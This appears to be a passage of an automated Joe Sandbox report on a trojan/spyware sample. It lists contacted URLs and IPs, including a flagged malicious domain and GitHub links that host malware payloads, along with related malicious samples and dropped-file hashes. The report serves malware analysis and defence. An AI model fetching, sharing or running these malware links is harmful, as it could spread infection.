                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186428733.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186326048.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186249341.00000000038FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://crl.rootca1.amazontrust.com/rootca1.crl0ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238626600.0000000003977000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://github.comdOiMp3TH.exe, 00000000.00000002.4461284237.00000000032D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://ocsp.rootca1.amazontrust.com0:ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238626600.0000000003977000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://hummskitnj.buzz:443/apin.txtPKghhqoznpon_638708802577261661.exe, 00000007.00000002.2361624208.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360203323.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://www.ecosia.org/newtab/ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186428733.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186326048.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186249341.00000000038FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&ctaghhqoznpon_638708802577261661.exe, 00000007.00000003.2290373903.000000000393C000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2266446094.000000000393C000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000002.2363117071.000000000393E000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2303858804.000000000393C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brghhqoznpon_638708802577261661.exe, 00000007.00000003.2239490888.0000000003BE6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://hummskitnj.buzz/dghhqoznpon_638708802577261661.exe, 00000007.00000003.2183388479.00000000006C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://ac.ecosia.org/autocomplete?q=ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186428733.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186326048.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186249341.00000000038FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpgghhqoznpon_638708802577261661.exe, 00000007.00000003.2239884596.0000000003942000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://hummskitnj.buzz:443/apighhqoznpon_638708802577261661.exe, 00000007.00000002.2361624208.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360203323.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2183388479.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          		unknown
                                                                                          https://raw.githubusercontent.comOiMp3TH.exe, 00000000.00000002.4461284237.00000000032F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgghhqoznpon_638708802577261661.exe, 00000007.00000003.2239884596.0000000003942000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://crt.rootca1.amazontrust.com/rootca1.cer0?ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238626600.0000000003977000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://raw.githubusercontent.comOiMp3TH.exe, 00000000.00000002.4461284237.000000000330B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refghhqoznpon_638708802577261661.exe, 00000007.00000003.2239884596.0000000003942000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477ghhqoznpon_638708802577261661.exe, 00000007.00000003.2290373903.000000000393C000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2266446094.000000000393C000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000002.2363117071.000000000393E000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2303858804.000000000393C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.enigmaprotector.com/ghhqoznpon_638708802577261661.exe, 00000007.00000002.2362101522.0000000000EF3000.00000040.00000001.01000000.00000007.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000002.2362101522.0000000001058000.00000040.00000001.01000000.00000007.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186428733.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186326048.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186249341.00000000038FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://hummskitnj.buzz/RXghhqoznpon_638708802577261661.exe, 00000007.00000003.2238402687.000000000394F000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238058591.000000000394C000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2262784662.000000000394E000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2262559814.000000000394E000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238144082.000000000394C000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238704688.000000000394F000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2239884596.000000000394F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown

                                                                                                        World Map of Contacted IPs

                                                                                                        • No. of IPs < 25%
                                                                                                        • 25% < No. of IPs < 50%
                                                                                                        • 50% < No. of IPs < 75%
                                                                                                        • 75% < No. of IPs

                                                                                                        Public IPs

                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                        185.199.108.133
                                                                                                        		raw.githubusercontent.comNetherlands
                                                                                                        		54113FASTLYUSfalse
                                                                                                        172.67.216.236
                                                                                                        		hummskitnj.buzzUnited States
                                                                                                        		13335CLOUDFLARENETUStrue
                                                                                                        20.233.83.145
                                                                                                        		github.comUnited States
                                                                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse

                                                                                                        General Information

                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                        Analysis ID:1581343
                                                                                                        Start date and time:2024-12-27 13:10:05 +01:00
                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                        Overall analysis duration:0h 8m 40s
                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                        Report type:full
                                                                                                        Cookbook file name:default.jbs
                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                        Number of analysed new started processes analysed:10
                                                                                                        Number of new started drivers analysed:0
                                                                                                        Number of existing processes analysed:0
                                                                                                        Number of existing drivers analysed:0
                                                                                                        Number of injected processes analysed:0
                                                                                                        Technologies:
                                                                                                        • HCA enabled
                                                                                                        • EGA enabled
                                                                                                        • AMSI enabled
                                                                                                        Analysis Mode:default
                                                                                                        Analysis stop reason:Timeout
                                                                                                        Sample name:OiMp3TH.exe
                                                                                                        Detection:MAL
                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@9/10@3/3
                                                                                                        EGA Information:Failed
                                                                                                        HCA Information:
                                                                                                        • Successful, ratio: 100%
                                                                                                        • Number of executed functions: 38
                                                                                                        • Number of non-executed functions: 2
                                                                                                        Cookbook Comments:
                                                                                                        • Found application associated with file extension: .exe
                                                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                        Warnings

                                                                                                        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                                                                        • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.63
                                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                        • Execution Graph export aborted for target OiMp3TH.exe, PID 4744 because it is empty
                                                                                                        • Execution Graph export aborted for target ghhqoznpon_638708802577261661.exe, PID 6396 because there are no executed function
                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                        Simulations

                                                                                                        Behavior and APIs

                                                                                                        TimeTypeDescription
                                                                                                        07:10:53API Interceptor25x Sleep call for process: powershell.exe modified
                                                                                                        07:11:00API Interceptor9171843x Sleep call for process: OiMp3TH.exe modified
                                                                                                        07:11:07API Interceptor8x Sleep call for process: ghhqoznpon_638708802577261661.exe modified

                                                                                                        Joe Sandbox View / Context

                                                                                                        IPs

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        185.199.108.133cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                        vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                                                                        • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                        VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                        • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                        OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                                                        • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                        gaber.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                        cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                        172.67.216.236nE0BePfCtd.exeGet hashmaliciousUnknownBrowse
                                                                                                        • swretjhwrtj.gq/autorun.exe
                                                                                                        bPNK0VeG79.exeGet hashmaliciousUnknownBrowse
                                                                                                        • swretjhwrtj.gq/Buld2.exe
                                                                                                        t7p1ekMto0.exeGet hashmaliciousAdes Stealer Raccoon RedLine SmokeLoader Tofsee VidarBrowse
                                                                                                        • swretjhwrtj.gq/GPU.exe
                                                                                                        GzsKHwvBmG.exeGet hashmaliciousRaccoon SmokeLoader Tofsee VidarBrowse
                                                                                                        • swretjhwrtj.gq/@Rarenut0.exe
                                                                                                        69CDTt1pad.exeGet hashmaliciousRaccoon RedLine SmokeLoader Tofsee VidarBrowse
                                                                                                        • swretjhwrtj.gq/@Rarenut0.exe
                                                                                                        20.233.83.145Y5kEUsYDFr.exeGet hashmaliciousUnknownBrowse
                                                                                                        • github.com/keygroup777-Ransomware/DOWNLOADER/raw/refs/heads/main/telefron.exe

                                                                                                        Domains

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        github.comYYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 20.233.83.145
                                                                                                        YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 20.233.83.145
                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                        • 20.233.83.145
                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                        • 20.233.83.145
                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                        • 20.233.83.145
                                                                                                        ORDER-241221K6890PF57682456POC7893789097393.j.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                        • 20.233.83.145
                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                        • 20.233.83.145
                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                        • 20.233.83.145
                                                                                                        58VSNPxrI4.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 20.233.83.145
                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                        • 20.233.83.145
                                                                                                        raw.githubusercontent.com8lOT1rXZp5.exeGet hashmaliciousRedLineBrowse
                                                                                                        • 185.199.111.133
                                                                                                        Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                        • 185.199.108.133
                                                                                                        YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 185.199.109.133
                                                                                                        YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 185.199.110.133
                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                        • 185.199.110.133
                                                                                                        Navan - Itinerary.pdf.scr.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 185.199.110.133
                                                                                                        BigProject.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 185.199.110.133
                                                                                                        Set-up!.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 185.199.108.133
                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                        • 185.199.108.133
                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                        • 185.199.111.133

                                                                                                        ASNs

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        CLOUDFLARENETUShttps://dnsextension.pro/invoice/d2d0bf8701b34bc296ca83b956c10720Get hashmaliciousUnknownBrowse
                                                                                                        • 104.21.31.138
                                                                                                        k0ukcEH.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 172.67.157.254
                                                                                                        appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                        • 104.21.94.92
                                                                                                        FloydMounts.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                        • 104.21.25.41
                                                                                                        5uVReRlvME.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, StealcBrowse
                                                                                                        • 172.67.165.185
                                                                                                        0A7XTINw3R.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 104.26.8.44
                                                                                                        RDb082EApV.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.11.101
                                                                                                        GnHq2ZaBUl.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.11.101
                                                                                                        vVJvxAfBDM.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                        • 104.21.11.101
                                                                                                        LIWYEYWSOj.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                        • 172.67.165.185
                                                                                                        MICROSOFT-CORP-MSN-AS-BLOCKUS5uVReRlvME.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, StealcBrowse
                                                                                                        • 20.233.83.145
                                                                                                        DRWgoZo325.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, VidarBrowse
                                                                                                        • 20.189.173.22
                                                                                                        aD7D9fkpII.exeGet hashmaliciousVidarBrowse
                                                                                                        • 204.79.197.219
                                                                                                        installer.batGet hashmaliciousVidarBrowse
                                                                                                        • 20.42.73.30
                                                                                                        din.exeGet hashmaliciousVidarBrowse
                                                                                                        • 51.104.15.253
                                                                                                        lem.exeGet hashmaliciousVidarBrowse
                                                                                                        • 204.79.197.219
                                                                                                        phish_alert_iocp_v1.4.48 - 2024-12-26T095152.060.emlGet hashmaliciousUnknownBrowse
                                                                                                        • 52.109.68.129
                                                                                                        phish_alert_iocp_v1.4.48 - 2024-12-26T092852.527.emlGet hashmaliciousUnknownBrowse
                                                                                                        • 20.42.73.24
                                                                                                        HVlonDQpuI.exeGet hashmaliciousVidarBrowse
                                                                                                        • 204.79.197.219
                                                                                                        Google Authenticator You're trying to sign in from a new location.msgGet hashmaliciousUnknownBrowse
                                                                                                        • 52.109.28.46
                                                                                                        FASTLYUShttps://dnsextension.pro/invoice/d2d0bf8701b34bc296ca83b956c10720Get hashmaliciousUnknownBrowse
                                                                                                        • 151.101.129.229
                                                                                                        grand-theft-auto-5-theme-1-installer_qb8W-j1.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.2.133
                                                                                                        5uVReRlvME.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, StealcBrowse
                                                                                                        • 185.199.110.133
                                                                                                        DRWgoZo325.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, VidarBrowse
                                                                                                        • 185.199.111.133
                                                                                                        8lOT1rXZp5.exeGet hashmaliciousRedLineBrowse
                                                                                                        • 185.199.111.133
                                                                                                        phish_alert_iocp_v1.4.48 - 2024-12-26T092852.527.emlGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.194.137
                                                                                                        https://contractnerds.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 151.101.193.21
                                                                                                        ReJIL-_Document_No._2500015903.msgGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.193.91
                                                                                                        http://booking.extranetguests.com/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                        • 151.101.194.137
                                                                                                        Google Authenticator You're trying to sign in from a new location.msgGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.192.217

                                                                                                        JA3 Fingerprints

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        3b5074b1b5d032e5620f69f9f700ff0en5Szx8qsFB.lnkGet hashmaliciousUnknownBrowse
                                                                                                        • 185.199.108.133
                                                                                                        • 20.233.83.145
                                                                                                        A4FY1OA97K.lnkGet hashmaliciousDanaBotBrowse
                                                                                                        • 185.199.108.133
                                                                                                        • 20.233.83.145
                                                                                                        vreFmptfUu.lnkGet hashmaliciousDanaBotBrowse
                                                                                                        • 185.199.108.133
                                                                                                        • 20.233.83.145
                                                                                                        skript.batGet hashmaliciousVidarBrowse
                                                                                                        • 185.199.108.133
                                                                                                        • 20.233.83.145
                                                                                                        msgde.exeGet hashmaliciousQuasarBrowse
                                                                                                        • 185.199.108.133
                                                                                                        • 20.233.83.145
                                                                                                        6ee7HCp9cD.exeGet hashmaliciousQuasarBrowse
                                                                                                        • 185.199.108.133
                                                                                                        • 20.233.83.145
                                                                                                        https://www.gglusa.us/Get hashmaliciousUnknownBrowse
                                                                                                        • 185.199.108.133
                                                                                                        • 20.233.83.145
                                                                                                        ERTL09tA59.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 185.199.108.133
                                                                                                        • 20.233.83.145
                                                                                                        GtEVo1eO2p.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 185.199.108.133
                                                                                                        • 20.233.83.145
                                                                                                        a0e9f5d64349fb13191bc781f81f42e1k0ukcEH.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 172.67.216.236
                                                                                                        https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102Get hashmaliciousUnknownBrowse
                                                                                                        • 172.67.216.236
                                                                                                        appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                        • 172.67.216.236
                                                                                                        FloydMounts.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                        • 172.67.216.236
                                                                                                        RDb082EApV.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 172.67.216.236
                                                                                                        GnHq2ZaBUl.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 172.67.216.236
                                                                                                        vVJvxAfBDM.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                        • 172.67.216.236
                                                                                                        LIWYEYWSOj.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                        • 172.67.216.236
                                                                                                        onaUtwpiyq.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 172.67.216.236
                                                                                                        CAo57G5Cio.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 172.67.216.236

                                                                                                        Dropped Files

                                                                                                        No context

                                                                                                        Created / dropped Files

                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2232
                                                                                                        Entropy (8bit):5.38001807625381
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:jWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugePu/ZPUyus:jLHyIFKL3IZ2KRH9OugYs
                                                                                                        MD5:EEE631A8D9446D79E1E9EA5F0D4D3C09
                                                                                                        SHA1:CE023643DAC11517F0D483E09BC53DF64B828E8E
                                                                                                        SHA-256:250FA2A4F0B4D970DDE35C2312825B63E0036AAE9F3119C0ACFC8BF47A0AE7E3
                                                                                                        SHA-512:95668547D554B120C853BC718251FAE241AF8DC5EED4762A54261DB324941BF53AEF2B70B72D5BE1011F212FCB1561F249FA9A8998254BE2354030D8F33D76C6
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4xmtuuxe.c2j.psm1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Reputation:high, very likely benign file
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c5bg4mrq.yie.psm1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Reputation:high, very likely benign file
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iz1po15v.c22.ps1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ll53ne1s.sxi.ps1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m5pbxo3o.mz2.ps1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
